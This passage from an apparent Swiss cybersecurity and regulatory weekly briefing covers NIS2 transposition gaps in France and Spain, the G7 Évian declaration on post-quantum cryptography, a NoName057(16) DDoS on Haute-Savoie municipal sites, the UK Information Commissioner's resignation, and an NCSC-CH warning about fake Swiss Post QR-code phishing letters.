NIS2 transposition is still incomplete across several Member States more than 18 months after the October 2024 deadline, with most of the EU now compliant but a minority — France and Spain among them — still lagging (EC Digital Strategy — NIS transposition tracker; Viktoria Compliance NIS2 tracker). France in particular has not yet enacted its NIS2 transposition vehicle, which means the national authority cannot formally designate in-scope entities or apply sanctions there — and NIS2-derived incident-notification obligations on French entities are therefore not yet enforceable. The operational consequence for Swiss organisations with French or Spanish supply-chain or data-processing counterparts: do not assume NIS2 notification and security obligations are operative in those jurisdictions yet, and confirm the contractual basis for any incident-notification flow rather than relying on a not-yet-transposed statutory one.

G7 Évian cybersecurity declaration calls PQC an "urgent priority" — and the expected hacktivist DDoS materialised on day one

The G7 Cybersecurity Working Group declaration, adopted around the Évian summit (15–17 June), names post-quantum cryptography an "urgent priority" with a call for coordinated industry-government migration, alongside AI-cyber dual-use risk, telecom resilience and SME cybersecurity; the European Commission issued a welcome statement linking it to the NIS2/CRA stack (ANSSI; European Commission, 2026-06-17). The PQC-urgency framing aligns with Swiss federal cryptographic-migration planning. Resolving the W24 looking-ahead watch item: the NCSC-CH-predicted hacktivist DDoS did materialise — NoName057(16) ran layer-7 DDoS on 15 June against public-sector and tourism sites in the Swiss-bordering Haute-Savoie department (Évian-les-Bains, Thonon-les-Bains, Saint-Gingolph municipalities, the EVA'D transport portal), causing temporary outages with no data compromise (Cyberattaque.org, 2026-06-16; NCSC-CH pre-event advisory). Attribution rests on the group's Telegram self-claim; no Swiss federal sites were reported hit. The lesson reconfirmed: NCSC-CH's pre-event DDoS guidance for summit-adjacent organisations was correctly calibrated, and the NoName057(16) pattern around Swiss-adjacent summits (cf. Bürgenstock 2024) holds.

UK ICO left leaderless mid-restructure — Commissioner resigns with immediate effect

UK Information Commissioner John Edwards resigned with immediate effect on 19 June after an independent workplace investigation found "a case to answer" over his conduct; Chief Executive Paul Arnold now holds Commissioner responsibilities under a scheme of delegation while a DSIT/parliament appointment process expected to take months runs its course (ICO, 2026-06-19; Computer Weekly, 2026-06-19; daily 06-21). This is a regulatory-capacity story for any Swiss or EU organisation with UK operations: the ICO's enforcement posture under Edwards (high-profile fines, age-assurance actions) is not guaranteed to continue unchanged under interim leadership, and the regulator is short its top accountability anchor at a time it is also mid-restructure. Defenders should not read the vacuum as reduced obligation — UK GDPR duties are unchanged — but enforcement timing and priorities may shift during the interregnum.

NCSC-CH — fake Swiss Post "Avis de passage" QR-code phishing in French-speaking Switzerland

NCSC-CH's Week 24 Wochenrückblick flagged a hybrid physical-plus-digital social-engineering campaign in French-speaking Switzerland: attackers drop fake Swiss Post collection-notice ("Avis de passage") letters into letterboxes, closely mimicking official branding, with a QR code leading to a phishing site that harvests identity and credit-card data (NCSC-CH, 2026-06-16). The physical-delivery vector defeats email-gateway controls entirely. Public-sector organisations in French-speaking cantons should brief staff on the physical-QR lure, since the Swiss Post brand is frequently abused and a letterbox-delivered QR bypasses every email-based phishing control.